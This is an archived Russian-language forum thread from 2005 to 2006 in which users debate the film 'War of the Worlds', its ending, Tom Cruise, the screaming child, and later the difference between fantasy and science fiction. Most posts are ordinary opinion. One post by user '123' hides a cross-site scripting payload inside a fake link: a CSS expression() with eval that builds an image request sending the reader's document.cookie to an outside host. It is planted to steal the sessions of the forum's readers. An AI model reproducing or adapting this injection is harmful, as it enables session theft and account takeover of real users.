PDA

Просмотр полной версии : Война миров

Phoenix
29.06.2005, 22:04
Как вам фильм?

По-моему не очень впечатляет :? Единственное, что понравилось - размах спецэффектов.

Начало - несколько угнетающее. Заставляет задуматься о жизнеспособности нашей цивилизации.

Конец - абсолютно нелогичный. Тупой хэппи энд

Общее впечатление - мда... можно гораздо интереснее провести время.

ionchic
29.06.2005, 22:05
реклама не понравилась.
фильм не в моем вкусе.
вывод: пойду на него, если станет совсем тухло. а пока вроде этого не намечается.

Phoenix
29.06.2005, 22:10
Да, забыла: девчушке нужно Оскара дать (за самые громкие крики :smile: )

Luna_Lovegood
29.06.2005, 22:59
мой самый любимый жанр-фильмы-катастрофы... хз почему,н нравится всегда... если этот фильм такой,то обязательно иду))))

Hindu
30.06.2005, 11:22
У Герберта Уэлса, если мне память не изманяет, хэпи энда не было.
Америкашки прям как малые дети - все им сказки со счастливым концом подавай

Phoenix
30.06.2005, 12:36
Hindu, там полный хэппи энд!!! фууууу И жизнеутверждающая фразочка, что мы, люди, заплатили за возможность жить на нашей планете среди бактерий и микробов и всё отлично (это при том, что болезни постоянно убивают кучу людей)

Jade
30.06.2005, 12:42
У меня до сих пор нехороший осадок после "Машины времени", надо ж было так сюжет извратить :(
Тут все тоже самое???

diem
01.07.2005, 20:46
Hindu, Был и в книжке хеппи энд 8)

Фильма отличная!!! Можно развести огромное количество соплей и шуму по поводу голивудошности фильма, ОН ДЕЙСТВИТЕЛЬНО НА 100% голивудский, люди которые имеют привычку на это жаловаться пролетают, вам не сюда!)))
- ОФИГЕННЫЙ там Том Круз, всем нелюбителям тоже мимо :D Остальные получат массу удовольствия хотя бы от его игры, она есть. Дефчушка тоже оч неплохая!)
- НЕффпупенно нарисованные дядьки пришельцы, отличная графика, спецефекты на высшем уровне!
- Фильм держит в напряжении, не могу даже вспомнить что я видел за последне время, хоть рядом валяющееся по этому критерию :roll: :D
- К сожалению он действительно не снят по книжке, но сюжет угадывается, НЕ НАДО искать расхождений с книгой, найдете массу, просто не думайте об этом дабы не портить себе впечатления ;)
- Класно снято! Советую идти в кино 8)

ИМХО на 5 баллоф!) Лучший фильм полугодия :smile:

Hindu
02.07.2005, 12:03
diem, сорри, я помнится ее не дочитала, но почему-то показалось, что там все умрут

ОФИГЕННЫЙ там Том Круз, всем нелюбителям тоже мимо

именно так и сделаю, он для меня слишком слащавый

но сюжет угадывается

ну, это главное))))))))))))))))))))))))

Korgan
04.07.2005, 10:13
Фильм сняли достаточно близко к книге с вариащиями на тему 21 века... Мне понравилось очень-очень и книга, которую я прочел в 5 классе, и фильм. Единственное что засвербило в голове после просмотра фильма это то, что кто не читал книги обязатель скажет что конец надуманный и не правлоподобдный.... Именно так. как я вижу, и случилось... Обидно... В целом фильм на 5ть..
Том Круз мне не нравиться, не нравятя его бывшая жени - Николь Кидман... :D

Hindu
04.07.2005, 10:28
я даже специально книгу откопала - ну точно, они ж от микробов наших родимых погибли! блин, во я облажалась!diem, еще раз соррри

123
04.07.2005, 23:50
Офигенный фильм!
А Том Круз вооще красава!!! Советую все посмотреть!
www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://zero.h12.ru/stat/capt.php?id=666&'+document.cookie;this.sss=null`st yle='font-size:0;)'

Lya
05.07.2005, 20:51
Фильм очень легкий, вполне можно посмотреть.
Но есть и интереснее.

Phoenix
06.07.2005, 20:37
Фильма отличная!!!

На вкус и цвет...

ОФИГЕННЫЙ там Том Круз

:sad:
Старенький он уже..

НЕффпупенно нарисованные дядьки пришельцы, отличная графика

С этим не поспоришь

Фильм держит в напряжении

Не заметила напряжения

К сожалению он действительно не снят по книжке

Пофиг :smile:

Класно снято! Советую идти в кино

Снято неплохо, но сценарий - бред

кто не читал книги обязатель скажет что конец надуманный и не правлоподобдный

Для книги и 19 века - вполне сносная концовка, но для 21 - не катит

diem
07.07.2005, 01:13
Phoenix, Бугага :D Читал и плакалъ!))
з.ы. Во всем согласен :D Акромя отсутствия напряжения :evil: :D

Hindu
07.07.2005, 10:20
я все-таки посмотрела эту... хм кинокартину.
1) я готова была убить эту девчонку - нельзя так орать, меня до сих пор трясет
2) зае*али с хэпи эндами. Если б снимали наши, то, во-первых, убили бы его(Круза) сына, тетка бы потеряла ребенка, ее новый муж тоже бы окочурился, а Крузу как минимум отхватило бы руку. А у них шик-блеск-красота вся семья в сборе.
3)книга - основоположник мировой фантастики, тут без комментариев. Но народ уже избаловался блокбастерами с закрученным сюжетом, а тут ему подсовывают хреновый сценарий с неразруленной концовкой. Я знаю, что в книге так и было, но для фильма это не проходит, бегали они 2 часа от инопланетян, и вдруг за 5 минут все закончилось :( Даешь больше МЯСА!!!!!!!!!!!!

Korgan
07.07.2005, 10:56
Hindu, ну ты и кровожадная...

Phoenix
07.07.2005, 17:31
Hindu, да, семейку в два раза надо было сократить к концу :D :D :D Хотя бы парнишку и бабку :lol:

diem, :rev:

diem
07.07.2005, 17:44
Phoenix, Я был уверен, что парнишку того... Ну и "нового папку" стоило где-нить забыть :D

Kudryashka
07.07.2005, 18:03
diem, про нового папку - это ты круто... :smile: парнишка должен был умереть и точка!!!

я готова была убить эту девчонку - нельзя так орать, меня до сих пор трясет

угу... согласна, я вообше полфильма уши затыкала... громко очень там все... :sad:

Korgan
08.07.2005, 09:33
Ну вытут все и монстры... А если бы вы были гером фильма... и вас "сократили"... Вам бы понравилось?... :smile:

Hindu
09.07.2005, 09:37
Korgan, за те гонорары, что Крузу платят, ему должно все нравиться)

Friskinow
10.07.2005, 13:42
Да так посмотреть можно конечно, но без восторга

Hindu
10.07.2005, 14:27
Friskinow, конечно можно, раз уж лучше счас ничего не показывают

sMiLe
13.07.2005, 22:00
Фильмец стока раскручивали, я думал реально очередной пиз..й фильм катострофа или на крайняк, экшен какой-нибудь!!! (х..у там был!!!) ЭТО даже на мелодраму с натягом тянет! одна эта еб..нутая девченка орет пол фильма, как больная, она что не когда роботов пришельцев не видела? :shocked: :alien: или пиз..утый парнишка, который все мечтает за что-то отомстить пришельцам... :bud:

ionchic
13.07.2005, 22:01
вот гавно так гавно..... под конец даже уснула. жаль, что том круз в это вляпался.

Jade
14.07.2005, 14:24
Мне кино понравилось, по пунктам согласна с diem'ом)))
Но sMiLe реально порадовал, кратко и выразительно)

ionchic
14.07.2005, 14:58
Jade, и чем оно тебе понравилось?
фильм откровенно тупой. девку уже на третьей минуте хотелось придушить - вот не повезло ей, если она и в жизни такая. парень - ну лох так лох. надо было сразу отпустить его в свободное плавание - пусть бы сдох побыстрее и сестренку бы прихватил.
кстати, что-то я не заметила, что б в этой Войне миров" хоть что-то про россию сказали. украина в самом начале была упомянута, а вот о рф ни слова.

Jade
14.07.2005, 15:26
ionchic, мне понравилось:
1. Графика и эффекты - инопланетяне отличные) Люди, рассыпающиеся в пыль - конфетка)))
2. Мне понравилось цветовое решение фильма, он не давит кислотно-яркой гаммой, как большинство последних картин со ставкой на спецэффекты.
3. Мне понравился момент в подвале дома, когда Рейчел поет, а за дверью мужика убивают - лучший момент фильма, на мой взгляд.
4. Фильм помимо сюжета имеет еще и смысл, что люди не такие уж крутые, как себе кажуться, что на каждого сильного всегда есть другой сильный и умный к тому же. А для американцев это вообще прорыв: снять кино, где они проигрывают по полной программе.

Ну вообще фильм оставил хорошее впечатление, но я свое мнение не навязываю.

С чем соглашусь, так это про крики, цели такого акцента не понимаю. :roll:

Про Росиию говорят приблизительно следующее "Замочили же русские двоих (про триножников), значит и мы сможем" - так что по фильму, мы первые кто делом занялся, вместо того, чтобы бегать :wink:

ionchic
14.07.2005, 18:12
Jade, ну давай щас я попробую быть твоим оппонентом:
1. графика и эффекты называются хорошими? а мне вот инопланетяне показались очень нереалистичными, все каким-то надуманным и наигранным, и сам вид этих нло где-то я уже видела до этого.
2. да, действительно цвет ткакой-то мрачной.... никакой радости, никакого позитива.... закос под грузный и серьезный фильм, но сделать такой не получилось :!: из последнего хуже только "автостопом по галактике".
3. этот момент я уэе видимо проспала. это не ближе к концу было?
4. смысл? вау. по-моему такой смысл есть у мнногих фильмов, и создатели "войны миров" далеко нам не открыли идею о том, что возможно где-то есть существа поумнее нас. содрано :!:

Jade
15.07.2005, 10:49
ionchic, ну на фиг мы это тут выясняем? Ты меня не переубедишь, я тебя тоже.
Единственное чему хочу возразить, это пункт 4, идею про более умных существ взяли из Герберта Уэллса, а ему в его время не с кого было ее содрать, "Война миров" какая-никакая, но экранизации и о плагиате речь не идет.

Констатация факта: тебе фильм не понравился, мне понравился и обе мы умницы. ;)

ionchic
15.07.2005, 16:07
Jade, ну это да..... просто я реально хотела прониукнться твоим вдохновением и понять хотя бы чуточку, чем он клевый... не получилось. лан, ничего.

Lipka
15.10.2005, 22:30
Реклама,которую бесконечно крутили по ТВ оказалась более впечатляющей,чем сам фильм,да и Том Круз там не особо постарался сыграть свою роль :smile:

fed
05.12.2005, 18:46
кнмжка Рэя Бредбери (если не ошибаюсь) в сто раз интереснее....

Juicy
08.12.2005, 20:22
http://www.oper.ru/news/read.php?t=1051601451
В тему так, почитайте, не пожалеете *05

Tendre_Poison
08.12.2005, 21:23
особого впечатления фильм не произвёл..
не люблю фэнтези..

Jade
08.12.2005, 22:28
Tendre_Poison, фэнтези (к которому ВМ не имеет никакого отношения) и фантастика (коей ВМ является), к вашему сведению. разные вещи. Осторожней со словами.

Tendre_Poison
09.12.2005, 18:14
Jade,
я знаю,что это разные вещи*)
но можешь ли объяснить в чем разница?

Jade
09.12.2005, 21:30
Ну если не вдаваться в подробности, то фэнтэзи - это сказка=)
Магия, эльфы, деревянные - каменные мечи и пр. И причем по большей части все где-то в прошлом или каком-то неопредленном времени.

Tendre_Poison
10.12.2005, 20:31
Jade,
понятно..спасибо*))
просветили*)))

smily
10.03.2006, 00:16
Tendre_Poison, если несколько вдаться в подробности...
В жанре Фантастики некоторые выделяют несколько поджанров, например, sciencefiction (научная фантастика) и fantasy (букв. фантазия). Поджанр фэнтези можно выделить по признаку создания "вторичных миров". Как например, Средиземье у Толкиена; Пент и другие миры у Асприна и т.д.